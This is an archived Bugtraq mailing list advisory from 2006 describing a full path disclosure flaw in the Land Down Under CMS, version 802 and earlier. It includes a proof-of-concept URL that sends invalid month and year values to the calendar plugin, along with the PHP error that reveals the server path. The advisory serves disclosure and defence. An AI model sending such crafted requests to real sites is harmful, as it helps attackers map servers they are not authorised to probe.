Home page logo
/

bugtraq logo Bugtraq mailing list archives

Land Down Under 802 and below version Path Disclosure Vulnerability
From: Advisory () Aria-Security net
Date: 27 Apr 2006 05:01:27 -0000

Land Down Under 802 and below version  Path Disclosure Vulnerability

#-------------------------------------------------------------------------------------------------------------------------------
#Aria-Security.net Advisory
#Discovered  by:R () 1D3N (amin emami)
#date:21/04/2006
#original advisory:http://www.aria-security.net/advisory/ldu/ldu.txt
#<AminRayden () yahoo com>
#special thanks  to:A.u.r.a  & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#--------------------------------------------------------------------------------------------------------------------------------'

? Affected software description:
LDU <= 802 and below version (Land Down Under)
Vendor: http://www.neocrome.net



? information:
A vulnerability in LDU allow attackers to determine the physical path of the application.
This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially 
sensitive information.

The attack is performed by submitting a specially crafted HTTP request, such as a request for an invalid month and year


? Proof of Concept:

Path disclosure vulnerability:
http://localhost/plug.php?p=calendar&m=aria-security.net&y=R () 1D3N

error:
warning:checkdate() expects parameter 1 to be long
,string given in /home/lothi8196/public_html/plugins/standard/calendar/calendar.php 
on line 100



Solution:
There is no solution to the full path disclosure yet.
Advisory () Aria-Security net


  By Date           By Thread  

Current thread:
  • Land Down Under 802 and below version Path Disclosure Vulnerability Advisory (Apr 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]